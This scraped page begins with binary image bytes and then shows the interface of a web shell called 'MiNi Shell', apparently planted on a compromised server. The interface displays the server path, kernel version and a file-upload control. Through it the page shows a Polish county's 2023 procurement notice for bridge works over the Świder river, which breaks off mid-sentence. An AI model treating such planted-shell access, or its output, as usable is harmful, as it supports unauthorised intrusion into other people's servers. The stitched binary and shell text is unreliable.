JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230117/0003877501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja infrastruktury drogowej Powiatu Otwockiego polegająca na modernizacji <br/>przepraw przez cieki wodne – etap II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja infrastruktury drogowej Powiatu Otwockiego polegająca na modernizacji <br/>przepraw przez cieki wodne – etap II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1d0cb5ec-966c-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00038775</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpotwock.eb2b.com.pl/edit-auction.html/380880 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej:<br/>„Platforma”) pod adresem: https://zdpotwock.eb2b.com.pl/ , która spełnia wymagania opisane w art. 64 ustawy. Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zakupowej.<br/>Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym<br/>https://platforma.eb2b.com.pl/user/terms lub https://xx.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej), akceptuje<br/>warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w Karczewie ul. Bohaterów<br/>Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria Bartnicka, email: iod@powiat-<br/>otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843),dalej<br/>„ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych **; na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>• nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do<br/>sprostowania lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-01/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest „Modernizacja infrastruktury drogowej Powiatu Otwockiego <br/>polegająca na modernizacji przepraw przez cieki wodne – etap II” w ramach Rządowego <br/>Funduszu Polski Ład: Program Inwestycji Strategicznych realizowana w systemie <br/>„zaprojektuj i wybuduj” <br/>2) W ramach zamówienia należy: <br/>a) wykonać dokumentację projektową na podstawie PFU, <br/>b) uzyskanie wymaganych opinii, sprawozdań, uzgodnień i zatwierdzeń dokumentacji <br/>projektowej wymaganych przepisami prawa umożliwiających rozpoczęcie robót <br/>budowlanych tj. uzyskanie pozwolenia na budowę lub decyzji ZRID – wykonawca jest <br/>zobowiązany do przygotowania wniosku wraz z uzasadnieniem nadania rygoru <br/>natychmiastowej wykonalności dla decyzji, <br/>c) pełnienie nadzoru autorskiego nad realizacją robót budowlanych według sporządzonej <br/>dokumentacji projektowej, <br/>d) wykonanie robót budowlanych zgodnie z zatwierdzoną przez organ architektoniczno-<br/>budowlany dokumentacją, <br/>e) wykonanie kompleksowej dokumentacji powykonawczej,<br/>f) uzyskanie pozwolenia na użytkowanie, <br/>3) Zadanie obejmuje wykonanie ww. zakresu: <br/>- obiekt mostowy przez rzekę Świder w ciągu drogi powiatowej Nr 2737W w km 2+645 w <br/>miejscowości Sępochów wraz z dojazdami, <br/>- obiekt mostowy przez rzekę Świder w ciągu drogi powiatowej Nr 2737W w km 2+722 w <br/>miejscowości Sępochów wraz z dojazdami, <br/>4) Szczegółowy opis przedmiotu zamówienia został określony w programie funkcjonalno-<br/>użytkowym (PFU) <br/>5) Dokumentację projektową oraz roboty budowlane należy wykonać zgodnie z założeniami <br/>określonymi w PFU </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45221100-3 - Roboty budowlane w zakresie budowy mostów</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232300-5 - Roboty budowlane i pomocnicze w zakresie linii telefonicznych i ciągów komunikacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>oraz spełniają warunki udziału w postępowaniu. <br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku <br/>w powyższym zakresie, <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/>wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym <br/>zakresie, <br/>3) sytuacji ekonomicznej i finansowej: <br/>Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową w <br/>wysokości nie mniejszej niż 2 000 000,00 zł (dwa miliony złotych), przy czym środki <br/>finansowe i zdolność kredytowa mogą być sumowane do wymaganej przez <br/>Zamawiającego wysokości. <br/>W przypadku gdy wysokość posiadanych środków finansowych lub wysokość zdolności <br/>kredytowej jest określona w innej walucie niż w złotych polskich, Wykonawca dokona <br/>przeliczenia tej wartości na złote polskie – na podstawie średniego kursu złotego w <br/>stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na <br/>dzień publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. <br/>W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia powyższy warunek zostanie spełniony jeżeli co najmniej jeden z <br/>wykonawców wspólnie ubiegających się o zamówienie albo wykonawcy łącznie wykażą, <br/>że posiadają środki finansowe lub zdolność kredytową w wymagalnej wysokości. <br/>4) zdolności technicznej i zawodowej: <br/>Zamawiający uzna za spełniony, jeżeli wykaże że: <br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy w tym okresie, wykonał należycie, zgodnie z <br/>przepisami prawa i prawidłowo ukończył co najmniej 2 zamówienia, które dotyczyły <br/>opracowania dokumentacji projektowej przebudowy/ rozbudowy/budowy mostu lub <br/>przepustu zlokalizowanego na drodze publicznej minimum klasy Z <br/>b) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z <br/>przepisami prawa budowlanego i prawidłowo ukończył co najmniej <br/>2 zamówienie, które dotyczyło wykonania robót budowlanych polegających na <br/>przebudowie, rozbudowie lub budowie lub przepustu zlokalizowanego na ciągu drogi <br/>publicznej minimum klasy Z o wartości pojedynczej roboty min. 0,7 mln zł <br/>c) dysponuje następującymi osobami: <br/>− 1 osobą pełniącą funkcje kierownika robót, która posiada uprawnienia budowlane <br/>do kierowania robotami w specjalności mostowej bez ograniczeń lub <br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na <br/>podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do <br/>kierowania robotami w zakresie jw., należącą do właściwej izby samorządu <br/>zawodowego oraz posiadająca doświadczenie na stanowisku kierownika budowy <br/>lub kierownika robót drogowych na minimum dwoma zadaniami polegającym na <br/>budowie lub przebudowie mostu lub przepustu zlokalizowanego w ciągu drogi <br/>publicznej minimum klasy Z. <br/>− 1 osobą pełniącą funkcje projektanta w specjalności mostowej, którą skieruje do <br/>realizacji niniejszego zamówienia, jako projektanta posiadającego uprawnienia do <br/>projektowania (bez ograniczeń) w specjalności mostowej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze. zm.) lub <br/>odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej <br/>obowiązujących przepisów albo odpowiadające im kwalifikację zawodowe, które <br/>zostały uznane na zasadach określonych w przepisach odrębnych, która wykonała <br/>min. 2 dokumentacje projektowe dotyczące budowy/ przebudowy mostu lub <br/>przepustu zlokalizowanego w ciągu drogi publicznej minimum klasy Z, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o <br/>którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5 podstaw <br/>wykluczenia z postępowania oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o <br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na <br/>Ukrainę służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu <br/>dotyczących sytuacji ekonomicznej lub finansowej należy przedłożyć informację banku lub <br/>spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych <br/>środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym <br/>niż 3 miesiące przed jej złożeniem <br/>4. W celu wykazania spełnienia przez Wykonawcę warunków udziału w postepowaniu <br/>dotyczących zdolności technicznej lub zawodowej należy przedłożyć: <br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat <br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca <br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem <br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w <br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami <br/>prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty <br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym <br/>charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty <br/>- Zamawiający nie wymaga złożenia do oferty informacji o robotach budowlanych <br/>niewykonanych lub wykonanych nienależycie. Zamawiający wymaga wykazania tylko <br/>zamówień niezbędnych dla spełnienia warunku określonego w SIWZ <br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z <br/>informacjami na temat ich uprawnień, niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o <br/>podstawie do dysponowania tymi osobami; wzór wykazu osób, skierowanych przez <br/>wykonawcę do realizacji zamówienia publicznego stanowi Załącznik do SWZ. <br/>c) wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu <br/>składania oferta jeżeli okres działalności jest krótszy- w tym okresie, wraz z podaniem <br/>przedmiotu, dat wykonania i podmiotu, na rzecz których dostawy zostały wykonane, <br/>oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są <br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencję bądź inne <br/>dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane a jeżeli z <br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie <br/>uzyskać tych dokumentów - inne dokumenty w przypadku świadczeń okresowych lub <br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/>należyte wykonanie powinny być wydane nie wcześniej niż trzy miesiące przed <br/>upływem terminu składania ofert albo wniosku o dopuszczenie do udziału w <br/>postepowaniu – załącznik do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków <br/>dowodowych wraz z ofertą. <br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków <br/>dowodowych wraz z ofertą. <br/>W przypadku gdyż wykonawca nie złoży 